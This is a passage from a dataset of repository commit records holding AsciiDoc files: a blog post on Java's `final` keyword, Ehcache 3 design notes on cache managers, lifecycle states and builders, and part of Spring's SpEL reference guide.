For primitives, the use of `final` effectively makes the variable a true constant (within its scope), but when applied to objects, it only makes the reference constant, but not the object itself, so care must be taken to not confuse the two concepts.\n\nThe second, less commonly used (and probably less well understood), meaning of `final` is as a modifier on classes and methods to restrict inheritance and method overriding. Applying `final` to a class prevents the creation of subclasses that extend it. Applying `final` to a method prevents subclasses from overriding that method.\n\nI am primarily concerned with the first meaning of `final` in this article, though I will touch on the second a bit as well.\n\n== Final Thesis\n\nNow that we have covered the meanings of `final`, we come back to the subject of when it ought to be used.\n\nAfter experimenting with different styles over the course of several years, I have settled upon the strongly held conviction that *`final` should be applied to _all_ fields, parameters, and variables except for cases where the value definitely needs to change over time* (and only after considering the alternatives). The sole exceptions to this rule are constants defined on interfaces, which are implicitly `final` without needing to use the keyword, and parameters of abstract methods, where `final` has no effect.\n\n== Preemptive Strike\n\n","old_contents":"= On the Subject of Finality\n:hp-tags: programming, Java, final, immutability\n\nThis is the second installment in the _How to Make Your Java Code Not Suck_ series.\n\n== Fightin' (key)words\n\nWhen debating Java code style, the one issue that has probably gotten me into the greatest number of heated arguments is the appropriate use of the keyword `final`. I am not alone in my views on the subject, but it seems that there are great unwashed masses of developers who have not yet been converted to the *Church of `final`*, and some of them seem to get quite annoyed when they see `final` used in places where it is not absolutely required.\n\nHowever, before I go into detail on what my exact position is on the subject, and why nonbelievers are doomed to burn in Mutability Hell, let's recap what, exactly, `final` means when it appears in Java code.\n\n== Final Overload\n\nFirst of all, any Java programmer worth his or her salt knows that `final` actually has two completely different meanings in Java, depending on where it is used.\n\nThe first, and probably most commonly used, meaning of `final` is as a modifier on declarations variables, fields, and parameters. When applied in front of one of these, it effectively makes the identifier a constant for the duration of his scope. This means that once the identifier is initialized, the value it refers to cannot be changed. Its use is generally mandated when defining constants (especially in conjuction with the `static` keyword), and prior to Java 8, its use was required by the compiler whenever an anonymous class creates a closure around a variable in the enclosing scope. For primitives, the use of `final` effectively makes the variable a true constant (within its scope), but when applied to objects, it only makes the reference constant, but not the object itself, so care must be taken to not confuse the two concepts.\n\nThe second, less commonly used (and probably less well understood), meaning of `final` is as a modifier on classes and methods to restrict inheritance and method overriding. 
Applying `final` to a class prevents the creation of subclasses that extend it. Applying `final` to a method prevents subclasses from overriding that method.\n\nI am primarily concerned with the first meaning of `final` in this article, though I will touch on the second a bit as well.\n\n== Final Thesis\n\nNow that we have covered the meanings of `final`, we come back to the subject of when it ought to be used.\n\nAfter experimenting with different styles over the course of several years, I have settled upon the strongly held conviction that *`final` should be applied to _all_ fields, parameters, and variables except for cases where the value definitely needs to change over time* (and only after considering the alternatives). The sole exceptions to this rule are constants defined on interfaces, which are implicitly `final` without needing to use the keyword, and parameters of abstract methods, where `final` has no effect.","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"7c739c2efd942946a149fc05546e700933093f28","subject":"y2b create post THE $35,000 RACING SIMULATOR","message":"y2b create post THE $35,000 RACING SIMULATOR","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-10-15-THE-35000-RACING-SIMULATOR.adoc","new_file":"_posts\/2016-10-15-THE-35000-RACING-SIMULATOR.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"mit","lang":"AsciiDoc"} {"commit":"2f039426ec7650e739c8c6d043896f98163f6b87","subject":"Add defaults related builder design guideline","message":"Add defaults related builder design guideline\n","repos":"GaryWKeim\/ehcache3,chrisdennis\/ehcache3,aurbroszniowski\/ehcache3,cljohnso\/ehcache3,alexsnaps\/ehcache3,AbfrmBlr\/ehcache3,lorban\/ehcache3,cschanck\/ehcache3,AbfrmBlr\/ehcache3,ljacomet\/ehcache3,cljohnso\/ehcache3,aurbroszniowski\/ehcache3,GaryWKeim\/ehcache3,cschanck\/ehcache3,chrisdennis\/ehcache3,ehcache\/ehcache3,rkavanap\/ehcache3,albinsuresh\/ehcache3,rkavanap\/ehcache3,ljacomet\/ehcache3,jhouserizer\/ehcache3,ehcache\/ehcache3,jhouserizer\/ehcache3,lorban\/ehcache3,henri-tremblay\/ehcache3,albinsuresh\/ehcache3","old_file":"design.basics.asciidoc","new_file":"design.basics.asciidoc","new_contents":"= Ehcache Design Fundamentals\n\n:toc:\n\n== `CacheManager`, `Cache` and their dependencies\n\nAs in the 1.x & 2.x line, Ehcache has the notion of a `CacheManager`, who manages `Cache` instances. Managing a `Cache`\nmeans fulfilling a couple of roles:\n\n - Life cycling it: e.g. `.init()`, `.closing()` the `Cache`;\n - Providing it with `Service` instance: A `CacheManager` comes with a set of base abstract services `Cache` can use\n and that it will lifecycle too; but the `CacheManager` can lifecycle any amount of additional `Service` types that\n gets registered with it. These `Service` can then be looked up, e.g. by `Cache` or other `Service` instances, using the\n `ServiceProvider` interface;\n - Finally, the `CacheManager` acts as a repository of alias'ed `Cache` instances. Unlike in the previous versions, `Cache`\n instances aren't named, but are registered with the `CacheManager` under an _alias_. 
The `Cache` is never aware of this.\n\nThis diagram tries to summarize the different roles:\n\nimage::https:\/\/raw.githubusercontent.com\/ehcache\/ehcache3\/master\/docs\/images\/design\/basics\/baseTypes.png[Base Types]\n\nA user will mostly interact with the `CacheManager` and `Cache` API types... He may need to configure specific\n`Service` types for his `Cache` instances to use. See <<configuration-types-and-builders>>\n\n=== The `CacheManager`\n\nWhile the `CacheManager` does act as a repository, it is _not_ possible to add a `Cache` directly to a `CacheManager`.\nA `Cache` can be created by a `CacheManager`, which will then keep a reference to it, alias'ed to a user-provided name.\nTo remove that `Cache` from the `CacheManager`, it has to be explicitly removed using `CacheManager.removeCache(String)`.\nUpon that method successfully returning, the `Cache`'s status will be `Status.UNINITIALIZED` and as such it will not be\nusable anymore, see <<state-transitions>> section below.\n\n=== The `Cache`\n\nA `Cache` is backed by a `Store` where all cached entries (i.e. key-to-value mappings) are held. The `Cache` doesn't know\nwhat topology this `Store` is using; whether it's storing these entries on the JVM's heap, off the heap, on disk, on a remote\nJVM or any combination of the above.\n\nWhen a `Cache` is being constructed, e.g. by the `CacheManager` on a `.createCache()` method invocation, the `CacheManager`\nwill look up a `Store.Provider` which is one of the bundled `Service` types of Ehcache, asking it to create a `Store` based\non the `CacheConfiguration` used to configure the given `Cache`. That indirection makes both the `Cache` and the\n`CacheManager` ignorant of what topology this `Cache` is to use. Ehcache comes with a `DefaultStoreProvider` that will\nbe loaded by the `ServiceProvider`, should none be explicitly provided. That in turn will resolve the required `Store`\ninstance to be provided to the `Cache` being created.\n\nimage::https:\/\/raw.githubusercontent.com\/ehcache\/ehcache3\/master\/docs\/images\/design\/basics\/cacheStore.png[Cache's Store]\n\nThe `Cache` also tries to never _fail_ on operations invoked, e.g. a get shouldn't result in throwing an exception if the\n`Store` that backs it up uses serialization and fails to retrieve the mapping. Instead, Ehcache tries to be resilient and\nwill, by default, try to clear that mapping from its `Store` and return `null` instead to the user. It is the responsibility of the\n`Cache` to handle the exceptions a `Store` may throw (the `Store` interface explicitly declares it throws\n`CacheAccessException`, which is a checked exception). The `Cache` will delegate failures to the `ResilienceStrategy`,\nwhich in turn is responsible for handling the failure.\n\nCurrently, Ehcache only has a single `ResilienceStrategy`, which supports single-JVM deployments, and will try to\n_heal_ the `Store` on failure, making the invoking action on a `Cache` a no-op. We'll add more `ResilienceStrategy`\nimplementations and make them pluggable when we move on to distributed topologies.\n\n=== The new `UserManagedCache`\n\n`UserManagedCache` instances are, as the name implies, managed by the user instead of being managed by a `CacheManager`.
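As a rough sketch of the intended usage — the builder name and signatures here are illustrative assumptions, not a committed API:

[source,java]
----
// the caller, not a CacheManager, drives the whole lifecycle
final UserManagedCache<Long, String> cache =
    UserManagedCacheBuilder.newUserManagedCacheBuilder(Long.class, String.class)
        .build(true); // init() immediately, since no CacheManager will do it

cache.put(42L, "forty-two");
assert "forty-two".equals(cache.get(42L));

cache.close(); // closing is the user's responsibility as well
----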
While\nthese instances are meant to be lightweight, short-lived ones, nothing prohibits a user from building a distributed\n`UserManagedCache` if so desired.\n\nAs the user manages that instance himself, he needs to provide all `Service` instances required by the `UserManagedCache`.\nAlso he'll need to invoke lifecycle methods on it (see <<state-transitions>>) and finally keep a reference to it, as it\nwon't be available in any `CacheManager`.\n\nimage::https:\/\/raw.githubusercontent.com\/ehcache\/ehcache3\/master\/docs\/images\/design\/basics\/userManagedCache.png[UserManagedCache]\n\n== State transitions\n\nA lifecycled instance, e.g. a `CacheManager` or a `UserManagedCache`, has three states represented by the\n`org.ehcache.Status` enum:\n\n . `UNINITIALIZED`: The instance can't be used: it probably just got instantiated or had `.close()` invoked on it;\n . `MAINTENANCE`: The instance is only usable by the thread that got the _maintenance lease_ for it. Special maintenance\n operations can be performed on the instance;\n . `AVAILABLE`: The operational state of the instance; all operations can be performed by any number of threads.\n\nimage::https:\/\/raw.githubusercontent.com\/ehcache\/ehcache3\/master\/docs\/images\/design\/basics\/stateTransitions.png[Statuses & transitions]\n\nState should only be maintained at the _higher_ user-visible API instance, e.g. a concrete `Cache` instance like `Ehcache`.\nThat means that it is the one responsible for blocking operations during state transitions or rejecting them in an _illegal state_.\nNo need for the underlying data structure to do so too (e.g. `Store`), as this would come at a much higher cost during runtime.\n\nNOTE: A generic utility class `StatusTransitioner` encapsulates that responsibility and should be reusable across types that\nrequire enforcing lifecycle constraints.\n\n== Configuration types and builders\n\nIn the most generic sense, configuration types are used to _configure_ a given service _while_ it's being constructed. A\nbuilder exposes a user-friendly DSL to configure and build _runtime instances_ (e.g. `CacheManager`). Finally, runtime\nconfiguration types are configured from configuration types and used at runtime by the actual configured instance,\nproviding a way for the user to mutate the behavior of that instance at runtime in limited ways.\n\n=== Configuring stuff\n\nYou don't necessarily ever get exposed to a _configuration_ for a given type being constructed. The builder can hide it\nall from you and will create the actual configuration at `.build()` invocation time. Configuration types are always\nimmutable. Instances of these types are used to configure some part of the system (e.g. `CacheManager`, `Cache`,\n`Service`, ...). If a given configured type has a requirement to modify its configuration, an additional _runtime\nconfiguration_ is introduced, e.g. `RuntimeCacheConfiguration`. That type will expose additional mutative methods for\nattributes that are mutable. Internally it will also let consumers of the type register listeners for these attributes.\n\nimage::https:\/\/raw.githubusercontent.com\/ehcache\/ehcache3\/master\/docs\/images\/design\/basics\/config.png[Configuration types]\n\n==== `ServiceProvider` and `ServiceConfiguration`\n\nA special type of configuration is the `ServiceConfiguration<T extends Service>` type.
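A bare-bones sketch of such a configuration follows; the `MailService` and its SMTP setting are invented for illustration, and the single `getServiceType()` accessor is an assumption about what the lookup described next requires:

[source,java]
----
// a hypothetical Service...
public interface MailService extends Service {
    void send(String recipient, String body);
}

// ...and the ServiceConfiguration identifying it, carrying its own settings
public final class MailServiceConfiguration implements ServiceConfiguration<MailService> {

    private final String smtpHost;

    public MailServiceConfiguration(final String smtpHost) {
        this.smtpHost = smtpHost;
    }

    public String getSmtpHost() {
        return smtpHost;
    }

    @Override
    public Class<MailService> getServiceType() {
        return MailService.class;
    }
}
----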
That configuration type enables\nthe `ServiceProvider` to look up the `ServiceFactory<T extends Service>` to use to create the `Service` that's being\nconfigured, see `ServiceProvider.findServiceFor(ServiceConfiguration<T> config): T extends Service`. This is what\nhappens underneath that call when the `CacheManager` or a `ServiceFactory` looks up `Service` instances:\n\n . The caller invokes `ServiceProvider.findServiceFor`\n . The `ServiceProvider` looks up whether it already has that `Service`\n .. If it does, that instance is being returned\n .. If it doesn't, it looks up all the `ServiceFactory` instances it has for one that creates instances of that `Service` type.\n ... If one is found in that `ServiceFactory` repository, it uses that to create the instance\n ... If none is found, it uses the JDK's `java.util.ServiceLoader` service to load `ServiceFactory` and rechecks\n .. If nothing could be found, an Exception is thrown\n\n=== Builder design guidelines\n\n - Copy the instance, apply the modification and return the copy. Never modify and return `this`\n - Accept other builders as input, instead of just the actual \"other thing's\" configuration\n - Provide named methods for boolean or `Enum` based settings. Apply this while keeping in mind that we do not want\n method explosion on the builder as a whole.\n - Default values are to be handled inside the configuration classes and not duplicated inside the builder.\n\n== `javax.cache` API implications\n\nWhile we know we don't want to strictly go by the JSR-107 (aka JCache) API contract in the Ehcache3 APIs (e.g. `CacheLoader` &\n`CacheWriter` contracts when concurrent methods on the `Cache` are invoked), we still need a way to have our JCache\nimplementation pass the TCK. It is important to at least read the specification with regard to any feature that's being\nimplemented and list dissimilarities as well as how they'll be addressed in the 107 module.\n\n== The `PersistentCacheManager`\n\nThe `PersistentCacheManager` interface adds lifecycle methods to the `CacheManager` type. Those lifecycle methods enable\nthe user to completely destroy `Cache` instances from a given `CacheManager` (e.g. destroy the clustered state of a `Cache` entirely,\nor remove all the data of a `Cache` from disk); as well as go into _maintenance mode_ (see <<state-transitions>> section).\n\n=== `CacheManagerBuilder.with()`'s extension point\n\nA `CacheManagerBuilder` builds _at least_ a `CacheManager`, but its\n`.with(CacheManagerConfiguration<N>): CacheManagerBuilder<N>` lets you build any subtype of `CacheManager` (currently\nthe supported types are a closed set of defined subtypes, but this could be extended to an open set later).\n\n[source,java]\n----\nPersistentCacheManager cm = newCacheManagerBuilder() \/\/ <1>\n .with(new CacheManagerConfiguration<PersistentCacheManager>()) \/\/ <2>\n .build(true); \/\/ <3>\n----\n\n<1> the `T` of `CacheManagerBuilder<T extends CacheManager>` is still `CacheManager`\n<2> the `CacheManagerConfiguration` passed in to `.with` now narrows `T` down to `PersistentCacheManager`\n<3> returns the instance of `T` built\n\n=== Locally persistent\n\nWhen building a `PersistentCacheManager` the `CacheManagerConfiguration<PersistentCacheManager>` passed to the builder\nwould let one configure all persistence-related aspects of `Cache` instances managed by the `CacheManager`, e.g.
\n\n=== Builder design guidelines\n\n - Copy the instance, apply the modification and return the copy. Never modify and return `this`\n - Accept other builders as input, instead of just the actual \"other thing's\" configuration\n - Provide named methods for boolean or `Enum` based settings. Apply this while keeping in mind that we do not want\n method explosion on the builder as a whole.\n - Default values are to be handled inside the configuration classes and not duplicated inside the builder.
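\nA minimal sketch of the first and third guidelines (the builder class and its settings are invented here for illustration):\n\n[source,java]\n----\npublic final class CacheConfigurationBuilder {\n\n    private final long heapEntries;\n    private final boolean storeByValue;\n\n    private CacheConfigurationBuilder(long heapEntries, boolean storeByValue) {\n        this.heapEntries = heapEntries;\n        this.storeByValue = storeByValue;\n    }\n\n    public static CacheConfigurationBuilder newCacheConfiguration() {\n        return new CacheConfigurationBuilder(0L, false);\n    }\n\n    \/\/ Returns a modified copy; `this` is never mutated or returned.\n    public CacheConfigurationBuilder heap(long entries) {\n        return new CacheConfigurationBuilder(entries, this.storeByValue);\n    }\n\n    \/\/ A named method instead of storeByValue(boolean), keeping call sites readable.\n    public CacheConfigurationBuilder storeByValue() {\n        return new CacheConfigurationBuilder(this.heapEntries, true);\n    }\n}\n----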
\n\n== `javax.cache` API implications\n\nWhile we know we don't want to strictly go by the JSR-107 (aka JCache) API contract in the Ehcache3 APIs (e.g. the `CacheLoader` &\n`CacheWriter` contracts when concurrent methods on the `Cache` are invoked), we still need a way to have our JCache\nimplementation pass the TCK. It is important to at least read the specification with regards to any feature that's being\nimplemented and list dissimilarities as well as how they'll be addressed in the 107 module.\n\n== The `PersistentCacheManager`\n\nThe `PersistentCacheManager` interface adds lifecycle methods to the `CacheManager` type. Those lifecycle methods enable\nthe user to completely destroy `Cache` instances from a given `CacheManager` (e.g. destroy the clustered state of a `Cache` entirely,\nor remove all the data of a `Cache` from disk), as well as go into _maintenance mode_ (see the <<state-transitions>> section).\n\n=== `CacheManagerBuilder.with()` 's extension point\n\nA `CacheManagerBuilder` builds _at least_ a `CacheManager`, but its\n`.with(CacheManagerConfiguration<N>): CacheManagerBuilder<N>` lets you build any subtype of `CacheManager` (currently\nthe supported types are a closed set of defined subtypes, but this could be extended to an open set later).\n\n[source,java]\n----\n\nPersistentCacheManager cm = newCacheManagerBuilder() \/\/ <1>\n .with(new CacheManagerConfiguration<PersistentCacheManager>()) \/\/ <2>\n .build(true); \/\/ <3>\n----\n\n<1> the `T` of `CacheManagerBuilder<T extends CacheManager>` is still `CacheManager`\n<2> the `CacheManagerConfiguration` passed in to `.with` now narrows `T` down to `PersistentCacheManager`\n<3> returns the instance of `T` built\n\n=== Locally persistent\n\nWhen building a `PersistentCacheManager`, the `CacheManagerConfiguration<PersistentCacheManager>` passed to the builder\nwould let one configure all persistence-related aspects of `Cache` instances managed by the `CacheManager`, e.g. the root\nlocation for writing cached data to.
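\nFor instance, one could imagine such a configuration carrying the root directory (the `CacheManagerPersistenceConfiguration` name is an assumption for illustration, not a committed API):\n\n[source,java]\n----\nPersistentCacheManager cm = newCacheManagerBuilder()\n    \/\/ hypothetical CacheManagerConfiguration<PersistentCacheManager> carrying the root location\n    .with(new CacheManagerPersistenceConfiguration(new File(\"\/var\/data\/ehcache\")))\n    .build(true);\n----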
\n\n=== Clustered topology\n\nIn a Terracotta clustered scenario, all clustered `Cache` instances are considered persistent (i.e. they will survive a\n_client_ JVM restart). So the idea is to provide all clustered configuration by passing such a\n`CacheManagerConfiguration<PersistentCacheManager>` instance, with all the Terracotta client configuration, to the\n`CacheManagerBuilder` at construction time.\n\n==== Persistence configuration\n\nAny given persistent `Cache` uses the lifecycle as described above in <<state-transitions>>. Yet the data structures on disk\nthat store the data have a lifecycle of their own. We think of the states of those structures in these terms:\n\n . Nonexistent, nothing there: nothing can be stored until these exist;\n . Online: the datastructures are present (with or without any data), referenced by the `Store`, and the `Cache` is usable;\n . Offline: the datastructures are present (with or without data), not referenced by any `Store`, and nothing accesses them.\n\nimage::https:\/\/raw.githubusercontent.com\/ehcache\/ehcache3\/master\/docs\/images\/design\/basics\/persistentStateTransitions.jpg[Persistence and statuses & their transitions]\n\nThe user can fall back to maintenance mode and use the `Maintainable` instance returned when transitioning to the\nmaintenance state (see the sketch below). That `Maintainable` can be used to:\n\n - `Maintainable.create()`, moving from nothing to online; _or_\n - `Maintainable.destroy()`, moving from offline to nothing\n\nthe associated data structures for a given `Cache` on disk or within the Terracotta Server stripe(s).\n\nWe also want to provide configuration-based _modes_ to automatically:\n\n - Create the persistent data structures if they don't already exist;\n - Drop the persistent data structures if they exist, and create them anew;\n - Verify the persistent data structures are there, otherwise fail fast;\n - Create the persistent data structures expecting them to not be there, otherwise fail fast.
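\nA sketch of the maintenance flow above (the `toMaintenance()` transition method name is assumed for illustration):\n\n[source,java]\n----\nMaintainable maintainable = persistentCacheManager.toMaintenance(); \/\/ assumed transition to MAINTENANCE\nmaintainable.create();  \/\/ nonexistent -> online: create the on-disk structures\n\/\/ ... or, to wipe a cache's persistent data entirely:\n\/\/ maintainable.destroy(); \/\/ offline -> nonexistent\n----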
\n","old_contents":"","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"9c11887fe8d119efb91403975c17a3bb231735b4","subject":"Use lowercase property names in SpEL examples","message":"Use lowercase property names in SpEL examples\n\nCloses gh-25538\n","repos":"spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework","old_file":"src\/docs\/asciidoc\/core\/core-expressions.adoc","new_file":"src\/docs\/asciidoc\/core\/core-expressions.adoc","new_contents":"[[expressions]]\n= Spring Expression Language (SpEL)\n\nThe Spring Expression Language (\"`SpEL`\" for short) is a powerful expression language that\nsupports querying and manipulating an object graph at runtime. The language syntax is\nsimilar to Unified EL but offers additional features, most notably method invocation and\nbasic string templating functionality.\n\nWhile there are several other Java expression languages available -- OGNL, MVEL, and JBoss\nEL, to name a few -- the Spring Expression Language was created to provide the Spring\ncommunity with a single well supported expression language that can be used across all\nthe products in the Spring portfolio. Its language features are driven by the\nrequirements of the projects in the Spring portfolio, including tooling requirements\nfor code completion support within the https:\/\/spring.io\/tools[Spring Tools for Eclipse].\nThat said, SpEL is based on a technology-agnostic API that lets other expression language\nimplementations be integrated, should the need arise.\n\nWhile SpEL serves as the foundation for expression evaluation within the Spring\nportfolio, it is not directly tied to Spring and can be used independently. To\nbe self contained, many of the examples in this chapter use SpEL as if it were an\nindependent expression language. This requires creating a few bootstrapping\ninfrastructure classes, such as the parser.
Most Spring users need not deal with\nthis infrastructure and can, instead, author only expression strings for evaluation.\nAn example of this typical use is the integration of SpEL into creating XML or\nannotation-based bean definitions, as shown in\n<<expressions-beandef, Expression support for defining bean definitions>>.\n\nThis chapter covers the features of the expression language, its API, and its language\nsyntax. In several places, `Inventor` and `Society` classes are used as the target\nobjects for expression evaluation. These class declarations and the data used to\npopulate them are listed at the end of the chapter.\n\nThe expression language supports the following functionality:\n\n* Literal expressions\n* Boolean and relational operators\n* Regular expressions\n* Class expressions\n* Accessing properties, arrays, lists, and maps\n* Method invocation\n* Relational operators\n* Assignment\n* Calling constructors\n* Bean references\n* Array construction\n* Inline lists\n* Inline maps\n* Ternary operator\n* Variables\n* User-defined functions\n* Collection projection\n* Collection selection\n* Templated expressions\n\n\n\n\n[[expressions-evaluation]]\n== Evaluation\n\nThis section introduces the simple use of SpEL interfaces and its expression language.\nThe complete language reference can be found in\n<<expressions-language-ref, Language Reference>>.\n\nThe following code introduces the SpEL API to evaluate the literal string expression,\n`Hello World`.\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\tExpression exp = parser.parseExpression(\"'Hello World'\"); \/\/ <1>\n\tString message = (String) exp.getValue();\n----\n<1> The value of the message variable is `'Hello World'`.\n\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\tval exp = parser.parseExpression(\"'Hello World'\") \/\/ <1>\n\tval message = exp.value as String\n----\n<1> The value of the message variable is `'Hello World'`.\n\n\nThe SpEL classes and interfaces you are most likely to use are located in the\n`org.springframework.expression` package and its sub-packages, such as `spel.support`.\n\nThe `ExpressionParser` interface is responsible for parsing an expression string. In\nthe preceding example, the expression string is a string literal denoted by the surrounding single\nquotation marks. The `Expression` interface is responsible for evaluating the previously defined\nexpression string. 
Two exceptions can be thrown, `ParseException` and\n`EvaluationException`, when calling `parser.parseExpression` and `exp.getValue`,\nrespectively.\n\nSpEL supports a wide range of features, such as calling methods, accessing properties,\nand calling constructors.\n\nIn the following example of method invocation, we call the `concat` method on the string literal:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\tExpression exp = parser.parseExpression(\"'Hello World'.concat('!')\"); \/\/ <1>\n\tString message = (String) exp.getValue();\n----\n<1> The value of `message` is now 'Hello World!'.\n\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\tval exp = parser.parseExpression(\"'Hello World'.concat('!')\") \/\/ <1>\n\tval message = exp.value as String\n----\n<1> The value of `message` is now 'Hello World!'.\n\nThe following example of calling a JavaBean property calls the `String` property `Bytes`:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\n\t\/\/ invokes 'getBytes()'\n\tExpression exp = parser.parseExpression(\"'Hello World'.bytes\"); \/\/ <1>\n\tbyte[] bytes = (byte[]) exp.getValue();\n----\n<1> This line converts the literal to a byte array.\n\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\n\t\/\/ invokes 'getBytes()'\n\tval exp = parser.parseExpression(\"'Hello World'.bytes\") \/\/ <1>\n\tval bytes = exp.value as ByteArray\n----\n<1> This line converts the literal to a byte array.\n\nSpEL also supports nested properties by using the standard dot notation (such as\n`prop1.prop2.prop3`) and also the corresponding setting of property values.\nPublic fields may also be accessed.\n\nThe following example shows how to use dot notation to get the length of a literal:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\n\t\/\/ invokes 'getBytes().length'\n\tExpression exp = parser.parseExpression(\"'Hello World'.bytes.length\"); \/\/ <1>\n\tint length = (Integer) exp.getValue();\n----\n<1> `'Hello World'.bytes.length` gives the length of the literal.\n\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\n\t\/\/ invokes 'getBytes().length'\n\tval exp = parser.parseExpression(\"'Hello World'.bytes.length\") \/\/ <1>\n\tval length = exp.value as Int\n----\n<1> `'Hello World'.bytes.length` gives the length of the literal.\n\nThe String's constructor can be called instead of using a string literal, as the following\nexample shows:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\tExpression exp = parser.parseExpression(\"new String('hello world').toUpperCase()\"); \/\/ <1>\n\tString message = exp.getValue(String.class);\n----\n<1> Construct a new `String` from the literal and convert it to upper case.
\n\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\tval exp = parser.parseExpression(\"new String('hello world').toUpperCase()\") \/\/ <1>\n\tval message = exp.getValue(String::class.java)\n----\n<1> Construct a new `String` from the literal and convert it to upper case.\n\n\nNote the use of the generic method: `public <T> T getValue(Class<T> desiredResultType)`.\nUsing this method removes the need to cast the value of the expression to the desired\nresult type. An `EvaluationException` is thrown if the value cannot be cast to the\ntype `T` or converted by using the registered type converter.\n\nThe more common usage of SpEL is to provide an expression string that is evaluated\nagainst a specific object instance (called the root object). The following example shows\nhow to retrieve the `name` property from an instance of the `Inventor` class or\ncreate a boolean condition:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ Create and set a calendar\n\tGregorianCalendar c = new GregorianCalendar();\n\tc.set(1856, 7, 9);\n\n\t\/\/ The constructor arguments are name, birthday, and nationality.\n\tInventor tesla = new Inventor(\"Nikola Tesla\", c.getTime(), \"Serbian\");\n\n\tExpressionParser parser = new SpelExpressionParser();\n\n\tExpression exp = parser.parseExpression(\"name\"); \/\/ Parse name as an expression\n\tString name = (String) exp.getValue(tesla);\n\t\/\/ name == \"Nikola Tesla\"\n\n\texp = parser.parseExpression(\"name == 'Nikola Tesla'\");\n\tboolean result = exp.getValue(tesla, Boolean.class);\n\t\/\/ result == true\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ Create and set a calendar\n\tval c = GregorianCalendar()\n\tc.set(1856, 7, 9)\n\n\t\/\/ The constructor arguments are name, birthday, and nationality.\n\tval tesla = Inventor(\"Nikola Tesla\", c.time, \"Serbian\")\n\n\tval parser = SpelExpressionParser()\n\n\tvar exp = parser.parseExpression(\"name\") \/\/ Parse name as an expression\n\tval name = exp.getValue(tesla) as String\n\t\/\/ name == \"Nikola Tesla\"\n\n\texp = parser.parseExpression(\"name == 'Nikola Tesla'\")\n\tval result = exp.getValue(tesla, Boolean::class.java)\n\t\/\/ result == true\n----\n\n\n\n\n[[expressions-evaluation-context]]\n=== Understanding `EvaluationContext`\n\nThe `EvaluationContext` interface is used when evaluating an expression to resolve\nproperties, methods, or fields and to help perform type conversion. Spring provides two\nimplementations.\n\n* `SimpleEvaluationContext`: Exposes a subset of essential SpEL language features and\nconfiguration options, for categories of expressions that do not require the full extent\nof the SpEL language syntax and should be meaningfully restricted. Examples include but\nare not limited to data binding expressions and property-based filters.\n\n* `StandardEvaluationContext`: Exposes the full set of SpEL language features and\nconfiguration options. You can use it to specify a default root object and to configure\nevery available evaluation-related strategy.\n\n`SimpleEvaluationContext` is designed to support only a subset of the SpEL language syntax.\nIt excludes Java type references, constructors, and bean references. It also requires\nyou to explicitly choose the level of support for properties and methods in expressions.\nBy default, the `create()` static factory method enables only read access to properties.\nYou can also obtain a builder to configure the exact level of support needed, targeting\none or some combination of the following (a sketch follows the list):\n\n* Custom `PropertyAccessor` only (no reflection)\n* Data binding properties for read-only access\n* Data binding properties for read and write
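\nFor example, a read-write data binding context could be built as follows. This sketch reuses the `Inventor` class from the examples above and assumes the `forReadWriteDataBinding()` factory method, the read-write sibling of the `forReadOnlyDataBinding()` call shown in the next section:\n\n[source,java]\n----\nExpressionParser parser = new SpelExpressionParser();\n\n\/\/ Opt in to both read and write access for data binding purposes.\nEvaluationContext context = SimpleEvaluationContext.forReadWriteDataBinding().build();\n\nInventor tesla = new Inventor(\"Nikola Tesla\", new GregorianCalendar(1856, 7, 9).getTime(), \"Serbian\");\nparser.parseExpression(\"name\").setValue(context, tesla, \"Nikola\"); \/\/ writing is allowed here\n----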
\n\n\n[[expressions-type-conversion]]\n==== Type Conversion\n\nBy default, SpEL uses the conversion service available in Spring core\n(`org.springframework.core.convert.ConversionService`). This conversion service comes\nwith many built-in converters for common conversions but is also fully extensible so that\nyou can add custom conversions between types. Additionally, it is\ngenerics-aware. This means that, when you work with generic types in\nexpressions, SpEL attempts conversions to maintain type correctness for any objects\nit encounters.\n\nWhat does this mean in practice? Suppose assignment, using `setValue()`, is being used\nto set a `List` property. The type of the property is actually `List<Boolean>`. SpEL\nrecognizes that the elements of the list need to be converted to `Boolean` before\nbeing placed in it. The following example shows how to do so:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tclass Simple {\n\t\tpublic List<Boolean> booleanList = new ArrayList<Boolean>();\n\t}\n\n\tSimple simple = new Simple();\n\tsimple.booleanList.add(true);\n\n\tEvaluationContext context = SimpleEvaluationContext.forReadOnlyDataBinding().build();\n\n\t\/\/ \"false\" is passed in here as a String. SpEL and the conversion service\n\t\/\/ will recognize 